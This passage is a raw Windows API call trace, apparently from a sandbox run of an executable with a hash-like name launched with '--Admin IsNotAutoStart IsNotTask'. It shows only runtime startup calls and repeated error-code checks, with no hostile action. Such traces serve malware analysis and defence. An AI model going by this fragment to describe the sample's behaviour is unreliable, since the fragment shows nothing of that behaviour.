(hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0087.871] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0087.871] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0087.872] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0087.872] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0087.872] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0087.872] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0087.872] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0087.872] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0087.873] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0087.873] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0087.873] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x214) returned 0x6e07d0 [0087.873] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0087.873] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0087.873] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0087.874] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0087.874] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0087.874] GetCurrentThreadId () returned 0x7ec [0087.874] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0087.874] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x800) returned 0x6e09f0 [0087.874] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0087.874] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0087.874] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0087.874] SetHandleCount (uNumber=0x20) returned 0x20 [0087.874] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --Admin IsNotAutoStart IsNotTask" [0087.874] GetEnvironmentStringsW () returned 0x250600* [0087.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0087.875] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x565) returned 0x6e11f8 [0087.875] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x6e11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0087.875] FreeEnvironmentStringsW (penv=0x250600) returned 1 [0087.875] GetLastError () returned 0x0 [0087.875] SetLastError (dwErrCode=0x0) [0087.875] GetLastError () returned 0x0 [0087.875] SetLastError (dwErrCode=0x0) [0087.875] GetLastError () returned 0x0 [0087.875] SetLastError (dwErrCode=0x0) [0087.875] GetACP () returned 0x4e4 [0087.875] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x220) returned 0x6e1768 [0087.875] GetLastError () returned 0x0 [0087.875] SetLastError (dwErrCode=0x0) [0087.875] IsValidCodePage (CodePage=0x4e4) returned 1 [0087.875] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0087.875] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0087.875] GetLastError () returned 0x0 [0087.875] SetLastError (dwErrCode=0x0) [0087.876] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0087.876] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0087.876] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0087.876] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0087.876] GetLastError () returned 0x0 [0087.876] SetLastError (dwErrCode=0x0) [0087.876] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0087.876] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0087.876] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᨎ駾@Ā") returned 256 [0087.876] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᨎ駾@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0087.876] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᨎ駾@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0087.876] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x97Téí\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0087.876] GetLastError () returned 0x0 [0087.876] SetLastError (dwErrCode=0x0) [0087.876] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0087.876] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᨎ駾@Ā") returned 256 [0087.876] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᨎ駾@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0087.876] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᨎ駾@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0087.876] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x97Téí\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0087.877] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4a52a8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe")) returned 0xa5 [0087.877] GetLastError () returned 0x0 [0087.877] SetLastError (dwErrCode=0x0) [0087.877] GetLastError () returned 0x0 [0087.877] SetLastError (dwErrCode=0x0) [0087.877] GetLastError () returned 0x0 [0087.877] SetLastError (dwErrCode=0x0) [0087.877] GetLastError () returned 0x0 [0087.877] SetLastError (dwErrCode=0x0) [0087.877] GetLastError () returned 0x0 [0087.877] SetLastError (dwErrCode=0x0) [0087.877] GetLastError () returned 0x0 [0087.877] SetLastError (dwErrCode=0x0) [0087.877] GetLastError () returned 0x0 [0087.877] SetLastError (dwErrCode=0x0) [0087.877] GetLastError () returned 0x0 [0087.877] SetLastError (dwErrCode=0x0) [0087.877] GetLastError () returned 0x0 [0087.878] SetLastError (dwErrCode=0x0) [0087.878] GetLastError () returned 0x0 [0087.878] SetLastError (dwErrCode=0x0) [0087.878] GetLastError () returned 0x0 [0087.878] SetLastError (dwErrCode=0x0) [0087.878] GetLastError () returned 0x0 [0087.878] SetLastError (dwErrCode=0x0) [0087.878] GetLastError () returned 0x0 [0087.878] SetLastError (dwErrCode=0x0) [0087.878] GetLastError () returned 0x0 [0087.878] SetLastError (dwErrCode=0x0) [0087.878] GetLastError () returned 0x0 [0087.878] SetLastError (dwErrCode=0x0) [0087.878] GetLastError () returned 0x0 [0087.878] SetLastError (dwErrCode=0x0) [0087.878] GetLastError () returned 0x0 [0087.878] SetLastError (dwErrCode=0x0) [0087.878] GetLastError () returned 0x0 [0087.879] SetLastError (dwErrCode=0x0) [0087.879] GetLastError () returned 0x0 [0087.879] SetLastError (dwErrCode=0x0) [0087.879] GetLastError () returned 0x0 [0087.879] SetLastError (dwErrCode=0x0) [0087.879] GetLastError () returned 0x0 [0087.879] SetLastError (dwErrCode=0x0) [0087.879] GetLastError () returned 0x0 [0087.879] SetLastError (dwErrCode=0x0) [0087.879] GetLastError () returned 0x0 [0087.879] SetLastError (dwErrCode=0x0) [0087.879] GetLastError () returned 0x0 [0087.879] SetLastError (dwErrCode=0x0) [0087.879] GetLastError () returned 0x0 [0087.879] SetLastError (dwErrCode=0x0) [0087.879] GetLastError () returned 0x0 [0087.879] SetLastError (dwErrCode=0x0) [0087.879] GetLastError () returned 0x0 [0087.879] SetLastError (dwErrCode=0x0) [0087.880] GetLastError () returned 0x0 [0087.880] SetLastError (dwErrCode=0x0) [0087.880] GetLastError () returned 0x0 [0087.880] SetLastError (dwErrCode=0x0) [0087.880] GetLastError () returned 0x0 [0087.880] SetLastError (dwErrCode=0x0) [0087.880] GetLastError () returned 0x0 [0087.880] SetLastError (dwErrCode=0x0) [0087.880] GetLastError () returned 0x0 [0087.880] SetLastError (dwErrCode=0x0) [0087.880] GetLastError () returned 0x0 [0087.880] SetLastError (dwErrCode=0x0) [0087.880] GetLastError () returned 0x0 [0087.880] SetLastError (dwErrCode=0x0) [0087.880] GetLastError () returned 0x0 [0087.880] SetLastError (dwErrCode=0x0) [0087.880] GetLastError () returned 0x0 [0087.880] SetLastError (dwErrCode=0x0) [0087.880] GetLastError () returned 0x0 [0087.881] SetLastError (dwErrCode=0x0) [0087.881] GetLastError () returned 0x0 [0087.881] SetLastError (dwErrCode=0x0) [0087.881] GetLastError () returned 0x0 [0087.881] SetLastError (dwErrCode=0x0) [0087.881] GetLastError () returned 0x0 [0087.881] SetLastError (dwErrCode=0x0) [0087.881] GetLastError () returned 0x0 [0087.881] SetLastError (dwErrCode=0x0) [0087.881] GetLastError () returned 0x0 [0087.881] SetLastError (dwErrCode=0x0) [0087.881] GetLastError () returned 0x0 [0087.881] SetLastError (dwErrCode=0x0) [0087.881] GetLastError () returned 0x0 [0087.881] SetLastError (dwErrCode=0x0) [0087.881] GetLastError () returned 0x0 [0087.881] SetLastError (dwErrCode=0x0) [0087.881] GetLastError () returned 0x0 [0087.882] SetLastError (dwErrCode=0x0) [0087.882] GetLastError () returned 0x0 [0087.882] SetLastError (dwErrCode=0x0) [0087.882] GetLastError () returned 0x0 [0087.882] SetLastError (dwErrCode=0x0) [0087.882] GetLastError () returned 0x0 [0087.882] SetLastError (dwErrCode=0x0) [0087.882] GetLastError () returned 0x0 [0087.882] SetLastError (dwErrCode=0x0) [0087.882] GetLastError () returned 0x0 [0087.882] SetLastError (dwErrCode=0x0) [0087.882] GetLastError () returned 0x0 [0087.882] SetLastError (dwErrCode=0x0) [0087.882] GetLastError () returned 0x0 [0087.882] SetLastError (dwErrCode=0x0) [0087.882] GetLastError () returned 0x0 [0087.882] SetLastError (dwErrCode=0x0) [0087.882] GetLastError () returned 0x0 [0087.882] SetLastError (dwErrCode=0x0) [0087.883] GetLastError () returned 0x0 [0087.883] SetLastError (dwErrCode=0x0) [0087.883] GetLastError () returned 0x0 [0087.883] SetLastError (dwErrCode=0x0) [0087.883] GetLastError () returned 0x0 [0087.883] SetLastError (dwErrCode=0x0) [0087.883] GetLastError () returned 0x0 [0087.883] SetLastError (dwErrCode=0x0) [0087.883] GetLastError () returned 0x0 [0087.883] SetLastError (dwErrCode=0x0) [0087.883] GetLastError () returned 0x0 [0087.883] SetLastError (dwErrCode=0x0) [0087.883] GetLastError () returned 0x0 [0087.883] SetLastError (dwErrCode=0x0) [0087.883] GetLastError () returned 0x0 [0087.883] SetLastError (dwErrCode=0x0) [0087.883] GetLastError () returned 0x0 [0087.883] SetLastError (dwErrCode=0x0) [0087.883] GetLastError () returned 0x0 [0087.884] SetLastError (dwErrCode=0x0) [0087.884] GetLastError () returned 0x0 [0087.884] SetLastError (dwErrCode=0x0) [0087.884] GetLastError () returned 0x0 [0087.884] SetLastError (dwErrCode=0x0) [0087.884] GetLastError () returned 0x0 [0087.884] SetLastError (dwErrCode=0x0) [0087.884] GetLastError () returned 0x0 [0087.884] SetLastError (dwErrCode=0x0) [0087.884] GetLastError () returned 0x0 [0087.884] SetLastError (dwErrCode=0x0) [0087.884] GetLastError () returned 0x0 [0087.884] SetLastError (dwErrCode=0x0) [0087.884] GetLastError () returned 0x0 [0087.884] SetLastError (dwErrCode=0x0) [0087.884] GetLastError () returned 0x0 [0087.884] SetLastError (dwErrCode=0x0) [0087.884] GetLastError () returned 0x0 [0087.885] SetLastError (dwErrCode=0x0) [0087.885] GetLastError () returned 0x0 [0087.885] SetLastError (dwErrCode=0x0) [0087.885] GetLastError () returned 0x0 [0087.885] SetLastError (dwErrCode=0x0) [0087.885] GetLastError () returned 0x0 [0087.885] SetLastError (dwErrCode=0x0) [0087.885] GetLastError () returned 0x0 [0087.885] SetLastError (dwErrCode=0x0) [0087.885] GetLastError () returned 0x0 [0087.885] SetLastError (dwErrCode=0x0) [0087.885] GetLastError () returned 0x0 [0087.885] SetLastError (dwErrCode=0x0) [0087.885] GetLastError () returned 0x0 [0087.885] SetLastError (dwErrCode=0x0) [0087.885] GetLastError () returned 0x0 [0087.885] SetLastError (dwErrCode=0x0) [0087.885] GetLastError () returned 0x0 [0087.885] SetLastError (dwErrCode=0x0) [0087.886] GetLastError () returned 0x0 